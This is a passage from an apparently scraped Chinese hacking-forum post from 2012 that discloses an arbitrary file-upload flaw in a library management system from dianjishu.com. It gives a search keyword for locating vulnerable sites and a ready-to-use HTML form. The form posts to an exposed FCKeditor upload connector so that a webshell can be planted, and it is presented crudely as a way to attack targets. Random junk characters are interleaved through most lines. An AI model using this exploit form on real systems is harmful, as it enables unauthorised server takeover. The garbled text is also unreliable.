主题:图书馆系统任意文件上传漏洞
7 z1 H H. X8 g& D# B5 T 作者:冰锋刺客& K5 A" s7 u* a, b
厂商:点击书(dianjishu.com)
% ]& i; I* d+ e: `- C6 b( W 日期:2012-6-21
' }$ U# }0 F8 J8 s2 y: _) [8 _ 8 s7 x p5 E1 e. U0 H( v
I 概述
* g, U7 x: l9 U) Q* n$ l+ ? 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell7 N, _: V U% V x7 e# U3 H
II 简介: d( ^; m' s+ n# T+ }; r
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
* t' f1 E1 P9 j$ z0 N1 F4 r 补充一个漏洞
7 X) }' Z( a) i2 C <form id="frmUpload" enctype="multipart/form-data"% g( ~$ @! _9 ?4 ?0 S7 s
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& p/ o: G$ M, W
<input id="btnUpload" type="submit" value="操翻他">
+ @) N# _; G9 R/ M </form>
' C" L& l5 c3 S1 ?9 E+ \( {) c 你们懂的
% S% ^# \+ p/ H 那傻逼提供还需要改包.
5 B: U0 n* p* ?% c2 F! ?1 l 自己看了下源代码发现fckeditor
2 j$ D7 }& g2 U" B- \% E, v: C 直接秒杀
2 B/ ]9 w7 b$ o2 v9 e3 T6 g |
发表于 2012-9-10 21:20:59
收藏
支持
反对